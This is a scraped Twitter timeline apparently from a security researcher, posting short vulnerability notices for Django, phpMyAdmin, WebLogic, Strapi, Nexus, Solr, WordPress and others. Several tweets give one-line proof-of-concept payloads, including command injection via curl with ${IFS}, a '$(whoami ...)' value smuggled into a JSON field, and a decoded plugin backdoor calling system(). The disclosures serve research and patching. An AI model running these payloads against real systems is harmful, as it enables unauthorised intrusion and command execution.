Tweets


  1. 24 minutes ago

    CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. FIX:

  2. Jan 16

    CVE-2020-2551 WebLogic RCE via IIOP protocol.

  3. Jan 14

    CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:

  4. Jan 10

    Found a "new" way to get JDBC Deserialization RCE, and it doesn't need any interceptor.

  5. Jan 2
  6. Jan 2

    CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that use the `toBSON` method; however, there are lots of no-auth mongo-express ... shodan: poc:

  7. 29 Dec 2019

    Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF👇 and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...): Thanks

  8. 10 Dec 2019
  9. 9 Dec 2019

    CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475

  10. 5 Dec 2019

    CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}

  11. 3 Dec 2019

    CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration

  12. 3 Dec 2019

    Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability

  13. 3 Dec 2019

    CVE-2019-5096 GoAhead web server code execution vulnerability : An exploitable code execution vulnerability exists in the processing of multi-part/form-data requests within the base GoAhead web server application in versions v5.0.1, v.4.1.1 and v3.6.5.

  14. 2 Dec 2019
  15. 25 Nov 2019

    CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation: CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS about CVE-2019-16663 / CVE-2019-16662

  16. 24 Nov 2019

    CVE-2019-18622 SQLI in phpMyAdmin: A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack through the designer feature.

  17. 18 Nov 2019

    CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX ) jython xxx 18983 command super_secret "ls -la"

  18. 17 Nov 2019

    backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php) base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") => system("whoami");

  19. Retweeted
    5 Nov 2019

    I get asked how I manage a full time job, content, steam, hacking on top of my personal life. I’m going to answer this once and only once: if you have time to waste on YouTube/Reddit you have time to learn how to hack. I go to bed an hour later and wake up an hour earlier

  20. 30 Oct 2019

    WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts POC: GET /wordpress/?static=1&order=asc Fix: Remove the static query property Analysis:

